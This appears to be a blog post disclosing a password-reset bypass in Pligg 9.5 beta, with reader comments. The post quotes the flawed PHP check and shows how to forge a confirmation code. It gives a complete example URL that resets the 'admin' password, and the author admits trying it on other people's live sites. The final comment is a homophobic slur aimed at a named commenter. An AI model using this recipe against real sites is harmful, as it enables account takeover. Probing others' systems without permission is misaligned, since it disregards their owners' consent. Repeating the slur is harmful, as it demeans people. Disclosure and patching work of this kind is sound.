Hacking Pligg 9.5 beta – Exploit
Pligg is a Social Bookmarking Web 2.0 Content Management System based on the popular social news website Digg.com
A security flaw makes it possible to change the password of any user and log in.
VideoSift is Hacked! VideoSift is one of the largest (still small) websites that uses Pligg.
How it works:
To reinitialize a forgotten password, Pligg follows a classical process. A confirmation code is generated and sent by email to the concerned user mail box. The user has to follow the link containing the confirmation code and if the confirmation code is checked successfully, the password is reinitialized to a pre-defined value.
you can find a part of the source code in charge of this check below :
pligg_dir/libs/html1.php:
1 2 3 4 5 6 7 8 9 | function generateHash($plainText, $salt = null){ if ($salt === null) { $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH); } else { $salt = substr($salt, 0, SALT_LENGTH); } return $salt . sha1($salt . $plainText); } |
pligg_dir/login.php :
1 2 3 | $confirmationcode = $_GET["confirmationcode"]; if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH)) == $confirmationcode){ $db->query('UPDATE `' . table_users . '` SET `user_pass` = "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login`= "'.$username.'"'); |
Unfortunately you can easily generate, for a given username, a confirmation code that passes successfully the check on line 2 above.
Example:
salt = 123456789 and username = admin
we have:
sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7
and thus:
$confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
with the following URL you can reinitialize the user “admin” password:
http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
Pligg Forum members have been notified about it via e-mail this morning. Most Pligg webmasters have’t signed up for the forum 
.
All Pligg websites I tried were vulnerable to this exploit. There is no commercial value for me, so don’t worry, administrators have been notified that it’s time to patch.
Shame on you for posting this expoit..
You are not helping anyone by doing this, you are only causing more problems..
The expolit has been reported 2 days ago on major security websites. The patch can be found on the pligg forum.
First of all showing people HOW to EXPLOIT this is just retarded. You could have simply written an article about it and not provided the tools everyone. Secondly if there is no commercial value for you than you shouldn’t be running adsense ads along side of it. Lastly you admit to (trying) which is hacking, into other peoples sites. P.S It is against adsense terms of service to provide exploits along with their ads. So I suggest you make some changes before someone reports you to adsense.
Whatever Dave…
SecurityFocus
Bugtraq
etc…
i think he should post the way he did, sometimes when ppl report about bugs or exploits, they dont get fixed, now maybe they will get off thier butts and fix thier garbage
dave meyers is a homo